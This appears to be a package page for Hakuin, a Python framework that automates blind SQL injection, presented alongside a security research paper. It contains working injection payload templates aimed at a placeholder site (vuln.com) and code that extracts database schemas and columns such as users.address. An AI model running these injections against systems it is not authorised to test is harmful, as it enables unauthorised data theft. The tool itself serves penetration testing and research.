Skip to main content

Blind SQL Injection optimization and automation framework

Project description

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework and tool written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism, and more.

Hakuin has been presented at esteemed academic and industrial conferences:

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin
hk -h

Note that installation is optional and you can use Hakuin directly from the source codes:

git clone https://github.com/pruzko/hakuin
cd hakuin
python3 hk.py -h

Command Line Tool

Hakuin ships with an intuitive tool called hk that offers most of Hakuin's features directly from the command line. To find out more, run:

hk -h

Custom Scripting

Sometimes, BSQLI vunerabilities are too tricky to be exploited from the command line and require custom scripting. This is where Hakuin's Python package shines, giving you total control over the extraction process.

To customize exploitation, you need to instruct Hakuin on how to inject its queries. This is done by deriving a class from the Requester and overriding the request method. Aside from injecting queries, the method must determine whether they resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = await aiohttp.get(f'http://vuln.com/', headers=headers)
        return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), MSSQL (SQL Server) DBMSs, and OracleDB but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL/OracleDB
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL, OracleDB

class StatusRequester(Requester):
    ...

async def main():
    ext = Extractor(requester=StatusRequester(), dbms=SQLite())
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas/Tables/Columns
# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')             # extracts schema names
tables = await ext.extract_table_names(strategy='model')                    # extracts table names
columns = await ext.extract_column_names(table='users', strategy='model')   # extracts column names
metadata = await ext.extract_meta(strategy='model')                         # extracts all table and column names

Once you know the DB structure, you can extract the actual content.

Example 1 - Extracting Column Data
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')    # detects types and extracts columns

# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')    # extracts text columns
res = await ext.extract_column_int(table='users', column='id')                              # extracts int columns
res = await ext.extract_column_float(table='products', column='price')                      # extracts float columns
res = await ext.extract_column_blob(table='users', column='id')                             # extracts blob columns

More examples can be found in the tests directory.

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

hakuin-0.1.10.tar.gz (5.2 MB view details)

Uploaded Source

Built Distribution

hakuin-0.1.10-py3-none-any.whl (5.3 MB view details)

Uploaded Python 3

File details

Details for the file hakuin-0.1.10.tar.gz.

File metadata

  • Download URL: hakuin-0.1.10.tar.gz
  • Upload date:
  • Size: 5.2 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/5.1.1 CPython/3.10.12

File hashes

Hashes for hakuin-0.1.10.tar.gz
Algorithm Hash digest
SHA256 ecf150b8e25822176b37bf5cc7c78c3e9259eaef53b6ce15d19f59dab0f5ba8c
MD5 091d889c29e6c7e0cec1c1a039509a80
BLAKE2b-256 51ea7850522bc5bb25dc9e42c2936d850976a591564ba8b386dcefec72aae84f

See more details on using hashes here.

File details

Details for the file hakuin-0.1.10-py3-none-any.whl.

File metadata

  • Download URL: hakuin-0.1.10-py3-none-any.whl
  • Upload date:
  • Size: 5.3 MB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/5.1.1 CPython/3.10.12

File hashes

Hashes for hakuin-0.1.10-py3-none-any.whl
Algorithm Hash digest
SHA256 83fa348525980ccf8eb61f846745c21cd922d091ccb5e29393f99878dbd20412
MD5 be0afec4a8a48a840c00a8a73fe3faa9
BLAKE2b-256 3811fe0b390916c3b0dab3509b3b607ce25165e62db1281c427c2b672117c0ea

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page